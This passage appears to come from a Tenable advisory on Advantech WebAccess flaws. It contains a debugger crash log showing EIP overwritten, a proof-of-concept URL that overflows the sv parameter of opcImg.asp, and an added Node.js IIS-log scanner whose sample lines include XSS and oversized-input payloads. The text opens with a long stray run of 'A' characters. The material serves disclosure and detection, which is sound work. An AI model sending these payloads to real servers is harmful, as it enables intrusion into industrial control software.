AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00000000`00400000 00000000`00411000   image00000000`00400000
ModLoad: 00000000`77ab0000 00000000`77c59000   ntdll.dll
ModLoad: 00000000`77c90000 00000000`77e10000   ntdll32.dll
ModLoad: 00000000`74900000 00000000`7493f000   C:\Windows\SYSTEM32\wow64.dll
ModLoad: 00000000`748a0000 00000000`748fc000   C:\Windows\SYSTEM32\wow64win.dll
ModLoad: 00000000`74890000 00000000`74898000   C:\Windows\SYSTEM32\wow64cpu.dll
(3324.21e4): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
ntdll!CsrSetPriorityClass+0x40:
00000000`77b5cb70 cc              int     3
0:000> !load winext/msec
0:000> g
ModLoad: 00000000`77990000 00000000`77aaf000   WOW64_IMAGE_SECTION
ModLoad: 00000000`75da0000 00000000`75eb0000   WOW64_IMAGE_SECTION
ModLoad: 00000000`77990000 00000000`77aaf000   NOT_AN_IMAGE
ModLoad: 00000000`77890000 00000000`7798a000   NOT_AN_IMAGE
ModLoad: 00000000`75da0000 00000000`75eb0000   C:\Windows\syswow64\kernel32.dll
ModLoad: 00000000`75fa0000 00000000`75fe7000   C:\Windows\syswow64\KERNELBASE.dll
ModLoad: 00000000`75f00000 00000000`75fa0000   C:\Windows\syswow64\ADVAPI32.dll
ModLoad: 00000000`75990000 00000000`75a3c000   C:\Windows\syswow64\msvcrt.dll
ModLoad: 00000000`75850000 00000000`75869000   C:\Windows\SysWOW64\sechost.dll
ModLoad: 00000000`75870000 00000000`75960000   C:\Windows\syswow64\RPCRT4.dll
ModLoad: 00000000`757f0000 00000000`75850000   C:\Windows\syswow64\SspiCli.dll
ModLoad: 00000000`757e0000 00000000`757ec000   C:\Windows\syswow64\CRYPTBASE.dll
ModLoad: 00000000`75ff0000 00000000`7614c000   C:\Windows\syswow64\ole32.dll
ModLoad: 00000000`77460000 00000000`774f0000   C:\Windows\syswow64\GDI32.dll
ModLoad: 00000000`76450000 00000000`76550000   C:\Windows\syswow64\USER32.dll
ModLoad: 00000000`76320000 00000000`7632a000   C:\Windows\syswow64\LPK.dll
ModLoad: 00000000`774f0000 00000000`7758d000   C:\Windows\syswow64\USP10.dll
ModLoad: 00000000`75cc0000 00000000`75d4f000   C:\Windows\syswow64\OLEAUT32.dll
(3324.21e4): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll32.dll -
ntdll32!LdrVerifyImageMatchesChecksum+0x96c:
77d3103b cc              int     3
0:000:x86> g
ModLoad: 75a40000 75aa0000   C:\Windows\SysWOW64\IMM32.DLL
ModLoad: 75aa0000 75b6c000   C:\Windows\syswow64\MSCTF.dll
ModLoad: 00000000`76290000 00000000`76313000   C:\Windows\syswow64\CLBCatQ.DLL
(3324.21e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
41414141 ??              ???
0:000:x86> r
eax=00000000 ebx=7efde000 ecx=0040c390 edx=0018f318 esi=0040f125 edi=0018fc6d
eip=41414141 esp=0018fa14 ebp=0018ff88 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
41414141 ??              ???
Below is a proof of concept. To test it, ensure you are logged in and replace the following items with valid values:
- IP/hostname
- proj
- node
http://192.168.1.192/broadweb/system/opcImg.asp?proj=myproject&node=mynode&sv=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&opt=1
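The following is an added example, not part of the Tenable advisory or Advantech's product: a Node.js scan over IIS W3C-format log lines that flags requests matching the two issues described in this advisory (an oversized sv value sent to opcImg.asp, and quote, tag or off-site url values sent to loadurl.asp). The sample log lines are constructed; the 492-byte threshold is the value the advisory gives for overwriting the instruction pointer.

```javascript
// Added example (not from the advisory): scan IIS W3C log lines for requests
// matching CVE-2018-15703 and CVE-2018-15704. SAMPLE_LOG is constructed data.
const SV_OVERFLOW_LEN = 492;        // sv length that overwrites EIP, per the advisory
const XSS_PARAMS = ["title", "url", "lc", "rc", "tc", "bc"];

// "a=1&b=%41" -> {a:"1", b:"A"}; malformed encodings are kept verbatim so they still reach the checks.
function parseQuery(qs) {
  const out = {};
  for (const pair of (qs && qs !== "-" ? qs.split("&") : [])) {
    const i = pair.indexOf("="), k = i < 0 ? pair : pair.slice(0, i), v = i < 0 ? "" : pair.slice(i + 1);
    try { out[k] = decodeURIComponent(v.replace(/\+/g, " ")); } catch (e) { out[k] = v; }
  }
  return out;
}

// Returns findings ({cve, client, detail}) for a W3C-format log text; the #Fields
// header decides which column is which, so the field order can vary per log.
function scanIisLog(text) {
  let fields = [], findings = [];
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (line.startsWith("#Fields:")) { fields = line.slice(8).trim().split(/\s+/); continue; }
    if (!line || line.startsWith("#")) continue;
    const cols = line.split(/\s+/);
    const rec = Object.fromEntries(fields.map((f, i) => [f, cols[i]]));
    const stem = (rec["cs-uri-stem"] || "").toLowerCase();
    const q = parseQuery(rec["cs-uri-query"]);
    // CVE-2018-15704: an sv value long enough to reach the saved return address
    if (stem.endsWith("/broadweb/system/opcimg.asp") && (q.sv || "").length >= SV_OVERFLOW_LEN) {
      findings.push({ cve: "CVE-2018-15704", client: rec["c-ip"], detail: "sv length " + q.sv.length + ", opt=" + q.opt });
    }
    // CVE-2018-15703: quote/tag characters in a reflected parameter, or a scheme-bearing
    // or protocol-relative url headed for the iframe
    if (stem.endsWith("/broadweb/loadurl.asp")) {
      for (const p of XSS_PARAMS) {
        const v = q[p];
        if (v !== undefined && (/['"<>]/.test(v) || (p === "url" && /^(?:[a-z][a-z0-9+.-]*:|\/\/)/i.test(v)))) {
          findings.push({ cve: "CVE-2018-15703", client: rec["c-ip"], detail: p + "=" + v.slice(0, 40) });
        }
      }
    }
  }
  return findings;
}

const SAMPLE_LOG = [
  "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
  "2018-09-01 10:00:01 GET /broadweb/loadurl.asp title=Overview&url=/broadweb/main.asp 10.0.0.5 200",
  "2018-09-01 10:00:02 GET /broadweb/loadurl.asp title=%27;alert(%22xss%22);// 10.0.0.9 200",
  "2018-09-01 10:00:03 GET /broadweb/loadurl.asp url=http://tenable.com 10.0.0.9 200",
  "2018-09-01 10:00:04 GET /broadweb/system/opcImg.asp proj=p1&node=n1&sv=" + "A".repeat(492) + "&opt=1 10.0.0.9 200",
  "2018-09-01 10:00:05 GET /broadweb/system/opcImg.asp proj=p1&node=n1&sv=RW.FASERVER&opt=1 10.0.0.5 200",
].join("\n");
```

Running scanIisLog(SAMPLE_LOG) yields three findings: the two loadurl.asp requests from 10.0.0.9 and the opcImg.asp request whose sv is 492 bytes; the two benign requests are not reported.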
Solution
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]